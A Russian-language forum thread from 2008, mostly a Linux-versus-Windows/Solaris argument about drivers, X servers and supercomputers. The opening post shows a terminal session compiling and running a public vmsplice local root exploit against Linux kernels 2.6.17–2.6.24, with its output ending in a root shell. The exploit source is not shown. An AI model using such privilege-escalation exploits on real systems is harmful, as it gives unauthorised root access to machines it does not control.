Автор Тема: Привет, линуксойды  (Прочитано 28884 раз)

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
Привет, линуксойды
« : 11.02.08, 14:25:06 »
Повышение привилегий пользователя до суперпользователя. Уязвимы ядра 2.6.17 - 2.6.24
grotesque@sanarin:~$ cc -o root root.c
grotesque@sanarin:~$ ./root
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40149000 .. 0x4017b000
[+] root
root@sanarin:~# mkdir /privet
root@sanarin:~# ls /
bin  boot  dev  etc  home  lib  lost+found  mnt  old  opt  optsun  privet
proc  procc  root  sbin  sparc-linux  sparc-solaris  sys  tftpboot  tmp  usr
var
root@sanarin:~#

Иногда срабатывает не с первого раза. Со второго-третьего срабатывает.

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
Re: Привет, линуксойды
« Ответ #261 : 15.02.08, 13:34:01 »
P.S.: до сих пор интересно.... почему виндузятник разработывает проекты под линукс
"мыши плакали, кололись...."

мне даж не это интересно. мне интересно нахрена доказывать что такая_то_ось - ацтой, так как на ней нет автокада, солид воркса, игрушке современные не пашут.
нужен автокад, солид воркс, фотожоп, современные игрушки - покупаем и ставим на вендовую машину, какие проблемы?) Цена даже коробочной хрен-с-ним Висты много ниже цен на спецсофт. Если человеку реально хватает возможностей имеющегося стека свободного ПО для повседневных задач в бесплатном линуксе - нахрена ему марать совесть нелицензией или проприетарным ПО (ну или не марать и пользоваться фриварными =) ) и ставить виндовс?) а то получается "яблоки -авно, они апельсинами не пахнут".

2 Нервный - Вы вроде человек знающий много, такой вопрос, я прост не в курсе - а суперкомпьютеры на венде бывают? кластеры вроде как не выше 4 машин создавать можно, про выше - не в курсе. Про те проекты которыми интересовался - Unix, или даже, простигосподи, линукс.

и мелкий оффтоп - WSUS позавчера _повторно_ закачал ИЕ7 (обновление до которого было явно запрещено в предыдущем...эм.."релизе" оного)
перебил все разрешения и втихаря распихал с утра же на все машины. мне както похрен, если честна, какой ИЕ стоит, но переучивать народ какт не улыбаетсо...
толи это мой косяк, толи уже не столь ненавязчивый ход майкрософта.
You and me are the same
We don't know or care who's to blame
But we know that whoever holds the reins
Nothing will change
Our cause has gone insane

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #262 : 15.02.08, 15:30:27 »
ндя... если в драйверном дистрибутеве эта часть кода распространяется в откомпиленном виде, то это не значит, что это не этот код...
просто при установке драйвера билдить GLX и MESA - тупо, тем более что на пользовательской машине могут не стоять среды разработки (привет из первого поста, вы до сих пор думаете что на каждой машине стоят утилиты для девелопинга? ну-ну) в билде дров лежат исключительно хедеры...

а что мешает использовать для технологических задач OpenSolaris? помоему большинство решаемых задач на нем - именно такого плана... хотя могу ошибаться)
с этйо ос сталкивался достаточно поверхностно)

1. Потому что Ваша прекрасная фирма не написала для этой не менее прекрасной операционной системы драйверов с поддержкой OpenGL.
и еще... под Solaris дрова нвидиевские есть... зайдите на сайт и скачайте ;-)

ууууу.
 Линуксойды. Кто. Согласен. С этим ?

Fantoma$

• Гость
« Ответ #263 : 15.02.08, 15:37:04 »
Нервный, ты пойди выпей штоли, совсем разнервничался.

http://www.nvidia.ru/object/solaris_display_1.0-8776_ru.html

Solaris x64/x86
Версия: 1.0-8776
Операционная система: Solaris x64/x86
Опубликовано: 19.10.2006

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #264 : 15.02.08, 15:39:10 »

Solaris x64/x86
Это не та солярка. У Нервного своя солярка, на базе винды, имеется

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #265 : 15.02.08, 15:42:07 »
да никто вас не душит. нафик вы никому не нужны. а молодежь какая-то совсем тупая пошла прости Господи

Ну были бы не нужны - ты бы несколько лет с ним не пытался бы бороться на форумах.

Борюсь с чем. С линуксом или линуксойдами. Подумайте над этим.

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #266 : 15.02.08, 15:43:44 »

Solaris x64/x86

А теперь внимание вопрос. Умник. Для каких иксов это ? Для родных солярисовских. Или ?

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #267 : 15.02.08, 15:45:53 »
Пациент отвечает односложно. Линукс. Взорвал его моск. Или?

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #268 : 15.02.08, 15:48:24 »

Что, линуксойд. Прокололся. Не знал, что в Солярке иксы свои ? А этот драйвер для x.org, который можно конечно же доставить, но ни одна приличная организация этого не делает. Угодай почему.

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #269 : 15.02.08, 15:50:31 »

Что, линуксойд. Прокололся. Не знал, что в Солярке иксы свои ? А этот драйвер для x.org, который можно конечно же доставить, но ни одна приличная организация этого не делает ?
Алекс Юстасу: грузите Линукс бочками тчк Билл Гейтс тчк

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #270 : 15.02.08, 15:52:23 »
 А насчёт того свинячьего бреда про MESA в пропиретарных драйверах nvidia все линуксойды согласны ?

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #271 : 15.02.08, 15:58:35 »
А насчёт того свинячьего бреда про MESA в пропиретарных драйверах nvidia все линуксойды согласны ?
Ты зачем усы сбрил,дурик?

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #272 : 15.02.08, 16:03:55 »
P.S.: до сих пор интересно.... почему виндузятник разработывает проекты под линукс
"мыши плакали, кололись...."

мне даж не это интересно. мне интересно нахрена доказывать что такая_то_ось - ацтой, так как на ней нет автокада, солид воркса, игрушке современные не пашут.
нужен автокад, солид воркс, фотожоп, современные игрушки - покупаем и ставим на вендовую машину, какие проблемы?) Цена даже коробочной хрен-с-ним Висты много ниже цен на спецсофт. Если человеку реально хватает возможностей имеющегося стека свободного ПО для повседневных задач в бесплатном линуксе - нахрена ему марать совесть нелицензией или проприетарным ПО (ну или не марать и пользоваться фриварными =) ) и ставить виндовс?) а то получается "яблоки -авно, они апельсинами не пахнут".

2 Нервный - Вы вроде человек знающий много, такой вопрос, я прост не в курсе - а суперкомпьютеры на венде бывают? кластеры вроде как не выше 4 машин создавать можно, про выше - не в курсе. Про те проекты которыми интересовался - Unix, или даже, простигосподи, линукс.

и мелкий оффтоп - WSUS позавчера _повторно_ закачал ИЕ7 (обновление до которого было явно запрещено в предыдущем...эм.."релизе" оного)
перебил все разрешения и втихаря распихал с утра же на все машины. мне както похрен, если честна, какой ИЕ стоит, но переучивать народ какт не улыбаетсо...
толи это мой косяк, толи уже не столь ненавязчивый ход майкрософта.

Суперкомпьютеры на венде бывают. 6 позиций в top500. На сегодняшний день, суперкомпьютер - кластер со свердешовой нодой. Серверная венда со своей ценой тут не очень вписывается. В этом сегменте теперь уже есть решения. Но сегмент очень консервативен. Раскачать этот рынок в одночасье не удастся. Но уже кое-что есть.

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #273 : 15.02.08, 16:05:11 »
Ты зачем усы сбрил,дурик?

Оффлайн SunKool

• Ветеран
  • Genius at work. ?
    • Просмотр профиля
« Ответ #274 : 15.02.08, 16:17:37 »
Дима, а сколько оперативной памяти мо жид вин2к3 выделить на один потокЪ?
Дымила, падая ракета
А от нее бежал расчет.
Кто хоть однажды видел это
Тот хрен к ракете подойдет.
 ДВЕ ДЕВЧУШКИ ИЗ ПСИХУШКИ ЕЛИ БУЛОЧКИ ВАТРУШКИ А ШАМАНКИ-НАРКОМАНКИ

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #275 : 15.02.08, 16:24:45 »

Столько же, сколько и в линуксеЬ соответвующей разрядности - чуть менее двух гигов либо чуть более 2.5 в зависимости от сплита обычным выделением памяти. И до 64 гигов замапить через PAE окнами.

Оффлайн immortal

• Постоялец
    • Просмотр профиля
« Ответ #276 : 15.02.08, 17:30:35 »
Суперкомпьютеры на венде бывают. 6 позиций в top500. На сегодняшний день, суперкомпьютер - кластер со свердешовой нодой. Серверная венда со своей ценой тут не очень вписывается. В этом сегменте теперь уже есть решения. Но сегмент очень консервативен. Раскачать этот рынок в одночасье не удастся. Но уже кое-что есть.

6 штучек Windows Compute Cluster Server 2003 против 381 штучек на Linux. Нервный пиши ещё!!!

Оффлайн ALion

• Ветеран
    • Просмотр профиля
« Ответ #277 : 15.02.08, 17:31:42 »
Блин уже почти все Холивары тут перебрали, но почему то забыли Firefox vs Opera vs IE! Даешь полную коллекцию холиваров!!!
ПСы: Нервный, не ходи к психологу ты нам нужен таким!!! :-)
Кстати, Опера рулит!
Качественная кровля: www.roof-garant.ru

Melkor

• Гость
« Ответ #278 : 15.02.08, 17:39:54 »
Нервный - Вы вроде человек знающий много, такой вопрос, я прост не в курсе - а суперкомпьютеры на венде бывают? кластеры вроде как не выше 4 машин создавать можно, про выше - не в курсе. Про те проекты которыми интересовался - Unix, или даже, простигосподи, линукс.

1)Больше 4 машин - можно . Не переживайте.
2) Кривые руки. Не переживайте, это лечится. Вот с мозгом сложнее будет. Вы всерьез поставили автоапрув на всусе? Удачи вам.
3) Насчет
Если человеку реально хватает возможностей имеющегося стека свободного ПО для повседневных задач в бесплатном линуксе - нахрена ему марать совесть нелицензией или проприетарным ПО (ну или не марать и пользоваться фриварными =) ) и ставить виндовс?)
Согласен на 100%.

Solaris x64/x86
Стесняюсь спросить. А вы много знаете дебилов админов ставящих солярку на x86? Нах там она нужна то?
Спарки просто так придумали?
Я не Дима, но отвечу. Дохрена. 32 битные винды ставят только в конторах торгующих помидорами. Благо сервера с EMT64 давно уже стали стандартом.

PS Пользуюсь случаем. Господа, те кто в теме. Может кто-то носом ткнуть в серьезные, валидные программы сертификации по никсам? А то кроме LPICn и сановских программ ничего не знаю. А человечка послать на учебу нужно:)

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #279 : 15.02.08, 18:31:01 »
> Если человеку реально хватает возможностей имеющегося стека свободного ПО для повседневных задач в бесплатном линуксе - нахрена ему марать совесть нелицензией или проприетарным ПО (ну или не марать и пользоваться фриварными =) ) и ставить виндовс?)

Убогие потребности некоторых - не повод восхвалять убогое ПО. Если кому-то там хватает, это не значит, это убожище годится людям со здоровой психикой.
 Что касается пропиретарщины, линуксойд охотно отравляет ядро пропиретарным драйвером nvidia. Охотно пользуетмя пропиретарной вмваре. Зачем ? А известно зачем. Ему пофик на идеи свободного открытого ПО. Линуксойду нужна ХАЛЯВА, а не свобода.

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #280 : 15.02.08, 18:41:26 »
> Стесняюсь спросить. А вы много знаете дебилов админов ставящих солярку на x86? Нах там она нужна то?
> Спарки просто так придумали?

В Солярке X сервер по умолчанию - XSun. А на Спарках он - единственный вариант. Вот под него драйверов NVidia с поддержкой OpenGL нет.